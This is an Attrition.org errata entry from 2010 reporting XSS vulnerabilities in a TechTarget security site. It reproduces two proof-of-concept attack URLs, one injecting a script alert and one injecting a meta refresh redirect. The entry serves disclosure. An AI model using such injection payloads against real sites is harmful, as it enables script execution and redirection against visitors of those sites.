Errata: SearchSecurity.TechTarget.com XSS

Tech Target Search Security XSS

2010/08/04

da d3v1l

http://twitter.com/securityshell/status/20336123631

da d3v1l posted two proof of concept XSS vulnerabilities in the http://searchsecurity.techtarget.com site on Twitter.

http://searchsecuritychannel.techtarget.com/googleResults/1,296420,sid97,00.html?query="><script>alert(String.fromCharCode(88,83,83))</script>

http://searchsecurity.techtarget.com/googleResults/1,296420,sid14,00.html?query=">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/">""

main page

ATTRITION

feedback